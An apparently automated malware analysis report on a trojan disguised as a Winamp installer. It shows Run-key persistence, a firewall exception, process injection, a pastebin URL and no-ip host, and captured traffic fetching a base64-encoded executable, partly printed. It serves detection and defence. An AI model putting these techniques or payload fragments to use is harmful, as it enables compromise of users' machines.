Trojan.GenericKD.3075701_6b2a96bc3d

by malwarelabrobot on April 16th, 2016 in Malware Descriptions.

Trojan.MSIL.Zapchast.aehog (Kaspersky), Trojan.GenericKD.3075701 (AdAware), Installer.Win32.SmartIM.FD, InstallerSmartIM.YR (Lavasoft MAS)
Behaviour: Trojan, Installer


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6b2a96bc3d18a5d5546eeb363f8585f1
SHA1: 9d067a565429a17951e389465e4b4d70246dc366
SHA256: 9e311091090cb688be24f80e6ab648f085f62c784fe4c7d8a4e93b838c1534bb
SSDeep: 393216:g6Pb7dod23L0btVB0AAupxr3hBmgfjDO9WlcKOyul0e1:gKb7W2b0plr3bmgfjDMWUy J1
Size: 17302542 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480

The Trojan injects its code into the following process(es):

teskmanger.exe:516
winamp5666_full_all.exe:580

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process downloader c sharp.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)

The process %original file name%.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)

The process winamp5666_full_all.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp (0 bytes)

Registry activity

The process downloader c sharp.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 6A 38 64 3F 1F 15 E9 E1 0E 96 A9 8C BC 1E 3F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU]
"di" = "!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "FireFox"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process teskmanger.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 76 5D F1 EE 84 42 CF CB 42 D1 2B 8F 34 E1 CF"

[HKCU\Software\17c320a39f13ba5af3ce000a29a3404e]
"[kl]" = ""

[HKCU]
"di" = "!"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."

The process %original file name%.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"InstallSource" = "c:\"
"InstallDate" = "20160415"
"EstimatedSize" = "16922"
"UninstallString" = "%Program Files%\winamp\winamp\Uninstall.exe"

"DisplayVersion" = "5.666"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"downloader c sharp.exe" = "FireFox"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"Publisher" = "winamp"
"VersionMajor" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayIcon" = "%Program Files%\winamp\winamp\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"winamp5666_full_all.exe" = "Winamp Installer"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 F2 01 E6 31 A2 5B AB ED CF 1F 9D 55 03 AC 72"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayName" = "winamp 5.666"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\winamp\winamp\"
"Language" = "1033"
"VersionMinor" = "666"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process netsh.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 7D B4 FE 46 CC 89 60 0D E7 3F A4 47 72 BD E5"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe:*:Enabled:teskmanger.exe"

The process winamp5666_full_all.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 40 0F 2A A8 D8 A1 71 9F 75 F6 D9 FF 60 71 46"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
227c6a6f69e227d79f08e44ee685785e c:\Documents and Settings\"%CurrentUserName%"\Application Data\teskmanger.exe
a1cd3f159ef78d9ace162f067b544fd9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\LangDLL.dll
bf712f32249029466fa86756f5546950 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\System.dll
227c6a6f69e227d79f08e44ee685785e c:\Program Files\downloader c sharp.exe
110cd80079e9572aef511b0491e63b8c c:\Program Files\winamp5666_full_all.exe
96360030a40dc543d5347e1cf917f530 c:\Program Files\winamp\winamp\Uninstall.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: winamp
Product Name:
Product Version:
Legal Copyright: winamp
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.666
File Description: winamp 5.666 Installation
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 148684 148992 4.57091 5e14e4ede2e2215bc7d72837b9871f8f
DATA 155648 10388 10752 2.62963 abafcbfbd7f8ac0226ca496a92a0cf06
BSS 167936 4341 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 176128 6040 6144 3.3864 a4e0ac39d5ed487ceea059fa23dfce5e
.tls 184320 8 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 188416 24 512 0.14174 c4fdd0c5c9efb616fcc85d66056ca490
.reloc 192512 6276 6656 4.56552 867a1120317d51734587a74f6ee70016
.rsrc 200704 7388 7680 3.29485 0ca03688054739a451150988e825bf9e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 8
2d310f9fd7e508e36dc492ed4a747ebc
43c4c1978a6de01afd8cee4b114754a0
22168eacdb2349a116e5ccc661dbdb86
b659ab8cca20689baa30aad970c4fd70
e0a3855f38ef976f298b4c68f62b4c33
ea7524801d5c0b511861c32e085e59c1
88a5f66e89ae9430fb59b42910009643
74f3f9a0ff2507197c4d5a4e19ada424

URLs

URL IP
hxxp://pastebin.com/raw/U2sjN8vL 104.20.63.56
qanasjrema.no-ip.biz 62.16.66.195


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:39 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d27769c06538c3575da5b7981848a85761460674359; expires=Fri, 14-Apr-17 22:52:39 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: HIT
Expires: Thu, 14 Apr 2016 23:22:40 GMT
Server: cloudflare-nginx
CF-RAY: 293abab8081b16be-ARN
7d58..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZS
BydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGBbyFYAAAAAAAAAAOAAAgEL
AQgAAFYAAAAGAAAAAAAAvnQAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAA
AAAADAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGh0
AABTAAAAAIAAAEACAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAA
AEgAAAAAAAAAAAAAAC50ZXh0AAAAxFQAAAAgAAAAVgAAAAIAAAAAAAAAAAAAAAAAACAAAG
AucnNyYwAAAEACAAAAgAAAAAQAAABYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAA
AKAAAAACAAAAXAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACgdAAAAAAAAE
gAAAACAAUALEsAADwpAAADAAAALwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAMwAQD2AAAAAAAAAHIBAABwgAEAAARyMwAAcIACAAAEFI
ADAAAEcj0AAHCABAAABHJbAABwgAUAAARyawAAcIAGAAAEcq0AAHCABwAABHLXAABwgAgA
AARy4QAAcIAJAAAEcu0AAHAoBAAACoAKAAAEcvkAAHAoBAAACoALAAAEcu0AAHAoBAAACo
AMAAAEcvkAAHAoBAAACoANAAAEKAUAAApvBgAACnMHAAAKgA4AAARzCAAACoAQAAAEFIAR
AAAEFoASAAAEcgMBAHCAEwAABBSAFAAABHMJAAAKgBUAAAQgARQAAI0MAAABgBYAAARyXw
EAcIAXAAAEFIAYAAAEKgAAGzADADsAAAABAAARfhAAAARvCgAACm8LAAAKcmEBAHB BgAA
BCgMAAAKF28NAAAKAm8OAAAK3g4lKA8AAAoKKBAAAAreACoAARAAAAAAAAAsLAAODQAAAR
swAwBEAAAAAgAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8RAAAKAgMoEgAA
Cm8TAAAKCt4QJSgPAAAKCwMKKBAAAAreAAYqARAAAAAAAAAyMgAQDQAAARswBABGAAAAAw
AAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8UAAAKAgMoEgAACgRvFQAAChcK
3hAlKA8AAAoLFgooEAAACt4ABioAAAEQAAAAAAAANDQAEA0AAAEbMAQArQMAAAQAAB
<<< skipped >>>


GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:32 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d057bf8bde70568e9fc963af32899d2721460674352; expires=Fri, 14-Apr-17 22:52:32 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Expires: Thu, 14 Apr 2016 23:22:33 GMT
Server: cloudflare-nginx
CF-RAY: 293aba8c3063373e-ARN
3a22..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZS
BydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGBbyFYAAAAAAAAAAOAAAgEL
AQgAAFYAAAAGAAAAAAAAvnQAAAAgAAAAgAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAA
AAAADAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGh0
AABTAAAAAIAAAEACAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAA
AEgAAAAAAAAAAAAAAC50ZXh0AAAAxFQAAAAgAAAAVgAAAAIAAAAAAAAAAAAAAAAAACAAAG
AucnNyYwAAAEACAAAAgAAAAAQAAABYAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAA
AKAAAAACAAAAXAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACgdAAAAAAAAE
gAAAACAAUALEsAADwpAAADAAAALwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAMwAQD2AAAAAAAAAHIBAABwgAEAAARyMwAAcIACAAAEFI
ADAAAEcj0AAHCABAAABHJbAABwgAUAAARyawAAcIAGAAAEcq0AAHCABwAABHLXAABwgAgA
AARy4QAAcIAJAAAEcu0AAHAoBAAACoAKAAAEcvkAAHAoBAAACoALAAAEcu0AAHAoBAAACo
AMAAAEcvkAAHAoBAAACoANAAAEKAUAAApvBgAACnMHAAAKgA4AAARzCAAACoAQAAAEFIAR
AAAEFoASAAAEcgMBAHCAEwAABBSAFAAABHMJAAAKgBUAAAQgARQAAI0MAAABgBYAAARyXw
EAcIAXAAAEFIAYAAAEKgAAGzADADsAAAABAAARfhAAAARvCgAACm8LAAAKcmEBAHB BgAA
BCgMAAAKF28NAAAKAm8OAAAK3g4lKA8AAAoKKBAAAAreACoAARAAAAAAAAAsLAAODQAAAR
swAwBEAAAAAgAAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8RAAAKAgMoEgAA
Cm8TAAAKCt4QJSgPAAAKCwMKKBAAAAreAAYqARAAAAAAAAAyMgAQDQAAARswBABGAAAAAw
AAEX4QAAAEbwoAAApvCwAACnJhAQBwfgYAAAQoDAAACm8UAAAKAgMoEgAACgRvFQAAChcK
3hAlKA8AAAoLFgooEAAACt4ABioAAAEQAAAAAAAANDQAEA0AAAEbMAQArQMAAAQAAB
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_632:

.idata
.rdata
P.reloc
P.rsrc
uxtheme.dll
;CRt$
PSAPI.dll
kernel32.dll
1.1.4
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
URLInfoAbout
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
WinExec
gdi32.dll
GetKeyState
ExitWindowsEx
EnumWindows
winmm.dll
ole32.dll
comctl32.dll
shell32.dll
GetWindowsDirectoryA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteA
cabinet.dll
0(0,00040
7 7$717?7
? ?$?(?,?0?4?
11h1
KWindows
UrlMon
version="1.0.0.0"
name="Microsoft.Windows.SIM"
<requestedExecutionLevel level="requireAdministrator"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"

winamp5666_full_all.exe_580:

.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
^.GU' 
c\q|V8SH%x
&%s.{
l%u0]
.reloc
SSh4!
u.hl!
PeekNamedPipe
CreatePipe
nsExec.dll
GetProcessHeap
COMDLG32.dll
nsDialogs.dll
System.dll
Dialer.dll
LangDLL.dll
RdQ.Ai
))))####
))##)))#
!.22,.)))
<8822....)))
)2.)))),
???8888<
<8892288
-   ****%
-   ****%%%
#022..  
::22000  #
22220.00  
:222//20   
<:8222:00   
(1611..,,
66111..,,%
#1[[[[,)
%1[[[[3/
%1[[[[33-
%2[[[[530/(
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46.5-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack < %d elements
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
